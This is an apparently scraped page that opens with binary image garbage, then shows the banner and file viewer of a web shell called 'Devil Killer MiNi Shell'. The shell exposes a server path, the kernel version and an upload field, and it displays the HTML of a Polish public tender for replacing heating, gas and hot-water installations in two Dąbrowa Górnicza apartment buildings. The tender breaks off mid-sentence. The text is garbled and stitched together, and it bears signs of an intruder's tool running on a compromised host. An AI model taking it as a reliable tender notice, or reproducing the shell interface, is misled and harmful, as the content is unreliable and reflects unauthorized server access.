JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240311/0023948901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wymiana źródła ogrzewania wraz z instalacją gazu, cwu i c.o. w budynkach wielorodzinnych w Dąbrowie Górniczej przy ul. Związku Orła Białego 11 oraz przy ul. Sikorskiego 10 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samorządowy Zakład Budżetowy Miejski Zarząd Budynków Mieszkalnych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271518876</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Tysiąclecia 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dąbrowa Górnicza</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-303</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32/ 260 86 52</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">32/ 264 27 67</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@mzbm.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzbm.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarządzanie nieruchomościami </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wymiana źródła ogrzewania wraz z instalacją gazu, cwu i c.o. w budynkach wielorodzinnych w Dąbrowie Górniczej przy ul. Związku Orła Białego 11 oraz przy ul. Sikorskiego 10 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3b1c4f5b-df9b-11ee-a01e-f641a8763d5f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00239489</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00037317/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Wymiana źródła ogrzewania wraz z instalacją gazu, cwu i co w budynku wielorodzinnym w Dąbrowie Górniczej przy ul. Związku Orła Białego 11 - Zadanie 1</p> <p class="mb-0">1.1.8 Wymiana źródła ogrzewania wraz z instalacja gazu, cwu i co w budynku wielorodzinnym w Dąbrowie Górniczej przy ul. Sikorskiego 10 -Zadanie nr 2</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3b1c4f5b-df9b-11ee-a01e-f641a8763d5f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia pomiędzy Zamawiającym a<br/>Wykonawcą odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy e-Zamówienia, dostępnej pod<br/>adresem https://ezamowienia.gov.pl. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>Szczegółowe informacje dotyczące przyjętego w postępowaniu sposobu komunikacji, znajdują się w rozdziale III podrozdziale 1<br/>niniejszej SWZ.<br/>Zamawiający wyznacza następujące osoby do kontaktu z wykonawcami:<br/>Pani/Pan Marta Bajor,<br/>tel. 32/ 260 86 19</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia,<br/>która jest dostępna pod adresem https://ezamowienia.gov.pl. Sposób sporządzenia dokumentów elektronicznych lub dokumentów<br/>elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie<br/>wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a) w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i<br/>przekazuje się jako załącznik), lub<br/>b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”).8. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków<br/>komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16<br/>kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913 oraz z 2021 r. poz. 1655) Wykonawca, w celu<br/>utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym<br/>zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”. Komunikacja w postępowaniu, z wyłączeniem<br/>składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy<br/>do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji”<br/>odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do<br/>komunikacji umożliwiają również dołączenie załącznika do przesyłanej<br/>wiadomości (przycisk „dodaj załącznik”). W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa<br/>Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie<br/>ubiegającego się o udzielenie zamówienia/podmiotu<br/>udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny,<br/>wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ<br/>zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny). Możliwość korzystania w postępowaniu z „Formularzy do<br/>komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na<br/>Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści<br/>dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia. Wszystkie wysłane i<br/>odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce<br/>„Komunikacja”.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza). Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej<br/>na adres e-mail: przetargi@mzbm.com.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w<br/>postępowaniu). We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się<br/>nazwą oraz numerami postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna dotycząca przetwarzania danych osobowych, opisana została w Rozdziale I pkt. 16 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 19 ust. 2 ustawy Pzp skorzystanie przez osobę, której dane osobowe<br/>dotyczą, z uprawnienia do stosowania lub uzupełnienia, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą ; Prawo do ograniczenia<br/>przetwarzania danych (art. 18 RODO), przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego prawa. Zgodnie z<br/>art. 19 ust. 3 Pzp w postępowaniu o udzielnie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art.<br/>18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/ZN/MB/004/02/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE1 :<br/>Wymiana źródła ogrzewania wraz z instalacją gazu, cwu i c.o. w budynku wielorodzinnym w Dąbrowie Górniczej przy ul. Związku Orła Białego 11 w ramach zadania: „Termomodernizacja gminnych budynków mieszkalnych”<br/>Roboty budowlane dla instalacji gazowej obejmują:<br/>1)	wytyczenie tras przewodów instalacji gazowej,<br/>2)	wykonanie poziomów gazowych z rur stalowych czarnych bez szwu na podwieszeniach w ciągu piwnic budynku,<br/>3)	demontaż i zmiana lokalizacji instalacji zlokalizowanych w miejscu projektowanych skrzynek gazowych,<br/>4)	wykonanie pionów z połączeniem poziomów mieszkaniowych, z jednoczesnym montażem urządzeń pomiarowych ( gazomierzy i armatury),<br/>5)	roboty spawalnicze,<br/>6)	montaż 12 kotłów gazowych dwufunkyjnych z zamknięta komorą spalania,<br/>7)	sprawdzenie drożności istniejących kominów murowanych,<br/>8)	montaż przewodów powietrznych i przewodów spalinowych w istniejących kominach prefabrykowanych,<br/>9)	podłączenie przewodów powietrznych i przewodów spalinowych do kotłów dwufunkcyjnych,<br/>10)	roboty montażowe w mieszkaniach, towarzyszące roboty budowlane w mieszkaniach,<br/>11)	montaż systemu detekcji gazu,<br/>12)	próbę szczelności instalacji,<br/>13)	uruchomienie instalacji oraz prace wykończeniowe.<br/>Roboty budowlane dla instalacji ciepłej wody użytkowej obejmują:<br/>1)	demontaż istniejącej instalacji ciepłej wody wraz z zaślepieniem,<br/>2)	wytyczenie nowych tras przewodów instalacji ciepłej wody,<br/>3)	wykonanie instalacji ciepłej wody użytkowej,<br/>4)	montaż wraz z zasileniem , z istniejącej instalacji wody zimnej,12 kotłów dwufunkcyjnych z osprzętem i armaturą,<br/>5)	montaż podejść wodociągowych pod zawory i baterie,<br/>6)	montaż zaworów i baterii,<br/>7)	roboty montażowe w mieszkaniach, roboty towarzyszące budowlane w mieszkaniach,<br/>8)	wykonanie płukania i prób szczelności instalacji ciepłej wody użytkowej.<br/>Roboty budowlane dla instalacji centralnego ogrzewania obejmują:<br/>1)	demontaż istniejących grzejników wraz z zaworami termostatycznymi i głowicami,<br/>2)	demontaż istniejących rurociągów,<br/>3)	wytyczenie tras przewodów i kanałów,<br/>4)	przygotowanie poszczególnych elementów instalacji,<br/>5)	montaż przewodów c.o.,<br/>6)	montaż grzejników oraz armatury,<br/>7)	podłączenie do dwufunkcyjnych kotłów,<br/>8)	wykonanie płukania, prób ciśnieniowych i pomiarów wraz z regulacją.<br/>Prace zostaną wykonane zgodnie z Zaświadczeniem o braku podstaw do wniesienia sprzeciwu do zgłoszenia robót budowlanych z dnia 20.08.2023 r., dotyczącego „Budowy wewnętrznej instalacji gazowej w budynku wielorodzinnym w Dąbrowie Górniczej przy ul. Zw. Orła Białego 11, działka nr 2167/4; obręb 0018 Ząbkowice- Nr WUA.6743.2.190.2023.KD”<br/>Przyłącza elektryczne i wodne: <br/>1) Zamawiający nie zapewnia zasilania w energię elektryczną. Wykonawca jest zobowiązany do wystąpienia do dostawcy o przyłączenie energii elektrycznej do celów budowlanych.<br/>2) Ujęcie wody z istniejącego poboru w miejscu wskazanym przez Zamawiającego, <br/>3) Wykonawca w okresie prowadzenia budowy zobowiązany jest pokrywać koszty dotyczące energii elektrycznej, zużycia wody i odprowadzenia ścieków w porozumieniu z Zamawiającym i dostawcą mediów.<br/>Założenia ogólne: <br/>1) Podstawą do wyceny jest dokumentacja techniczna oraz przedmiar robót,<br/>2) Do wyliczonego zakresu robót wg przedmiaru robót, Wykonawca winien naliczyć koszty dodatkowe, tj.:<br/>•	zagospodarowanie placu budowy,<br/>•	zabezpieczenie placu budowy przed dostępem osób trzecich,<br/>•	zużycie wody i energii,<br/>•	zabezpieczenie robót pod względem BHP,<br/>•	koszty nadzoru właścicieli i użytkowników uzbrojenia technicznego oraz ewentualnych zabezpieczeń dodatkowych, zaleconych przez tychże właścicieli i użytkowników w trakcie prowadzenia robót,<br/>•	koszty nadzorów autorskich, w przypadku zaproponowania innych rozwiązań konstrukcyjnych wymagających akceptacji projektanta, konstruktora,<br/>•	odszkodowania za szkody wyrządzone osobom trzecim na skutek prowadzenia w/w robót.<br/>•	zapewnienia i zabezpieczenia dojść i dojazdu do posesji w trakcie realizacji robót<br/>•	prace porządkowe przyległego terenu,<br/>•	koszt wywozu i utylizacji materiałów z rozbiórki, odpadów, śmieci oraz nie-potrzebnych urządzeń. Po wykonaniu robót Wykonawca uporządkuje te-ren budowy. Wykonawca zobowiązany jest przedstawić Zamawiającemu karty składowanych odpadów. Wszystkie koszty z tym związane obciążają Wykonawcę. Sposób i miejsce składowania materiałów pochodzących z rozbiórki, pozostaje w gestii Wykonawcy. Za wszystkie szkody spowodo-wane nieprawidłowym składowaniem materiałów pochodzących z rozbiórki odpowiada Wykonawca.<br/>3) Wszystkie wyroby muszą posiadać krajową deklarację lub certyfikat zgodności zgodnie z wymaganiami dla wyrobów budowlanych oraz spełniać wymagania Polskich Norm, <br/>4) Roboty budowlane należy wykonać zgodnie z załączoną dokumentacją projektową, specyfikacją techniczną wykonania i odbioru robót, wytycznymi określonymi w SWZ, z wiedzą techniczną i sztuką budowlaną, przepisami BHP i ppoż. <br/>5) Wszystkie wskazane z nazwy wyroby/materiały użyte w specyfikacji technicznej wykonania i odbioru robót budowlanych i przedmiarze robót należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Zamawiający dopuszcza składanie ofert „równoważnych” z zastrzeżeniem, że uwzględnione w wycenie produkty nie odbiegają jakością, standardem i parametrami technicznymi od założonych. Wykonawca do oferty dołączy wykaz rozwiązań równoważnych z podziałem na wyroby/materiały wymagane i wyroby materiały/oferowane.<br/>6) Wykonawca do zgłoszenia odbioru zobowiązany jest dołączyć dokumentację <br/>powykonawczą. Dokumentacja powykonawcza powinna być złożona z kompletem dokumentów w segregatorze z podziałem na poszczególne branże w 1 egz. i powinna zawierać: <br/>- spis treści, <br/>- protokół przekazania placu budowy, <br/>- Dziennik Budowy - wypełnione dzienniki budowy wraz z naniesionymi ewentualnymi zmianami w dokumentacji, <br/>- oświadczenia kierownika budowy i robót o zakończeniu budowy, <br/>- dokumentację wykonawczą wraz z naniesionymi przez uczestników procesu budowlanego zmianami występującymi w toku realizacji z podziałem na poszczególne branże, <br/>- protokoły prób i sprawdzeń (wszystkie branże), <br/>- elektrycznej, <br/>- gazowej, <br/>- ciepłej wody użytkowej, <br/>- c.o., <br/>- powykonawcze opinie kominiarskie w zakresie przewodów wentylacyjnych i spalinowych . <br/>- komplet deklaracji zgodności EC, posegregowanych atestów, DTR, gwarancji <br/>i dokumentów na poszczególne użyte materiały i urządzenia wbudowane w lokal <br/>(dokumentacja powinna być podzielona na branże /budowlaną/ elektryczną/ sanitarną/ ze stosownymi wykazami, załączone dokumenty powinny określać poszczególne elementy realizowane w toku inwestycji), <br/>- dokumentację zdjęciową budynku oraz wnętrza (w 1 egz.) przed i po wykonaniu prac - na płytach CD/DVD/ PenDrive. <br/>- dokumenty i tabele porównawcze pozwalające ocenić Zamawiającemu, co najmniej równoważność parametrów zastosowanych materiałów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111100-9 - Roboty w zakresie burzenia</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45333000-0 - Roboty instalacyjne gazowe</p> <p class="mb-0">45331110-0 - Instalowanie kotłów</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Przy wyborze najkorzystniejszej oferty dla każdego Zadania zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów: cena waga 60%, okres gwarancji waga 20%, doświadczenie kierownika budowy waga 20%. <br/>2)	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku. <br/>Za najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w podanych kryteriach oceny ofert. Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: <br/>Sp = C1 +C2 + C3<br/>Ogólna ilość uzyskanych punktów nie może przekroczyć 100.<br/>3)	Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>4)	W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze tj. w kryterium cena. <br/>Jeżeli oferty otrzymają taką sama ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną. <br/>Jeżeli nie można dokonać wyboru oferty w sposób opisany w zdaniu powyżej, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w określonym terminie ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie kierownika budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu 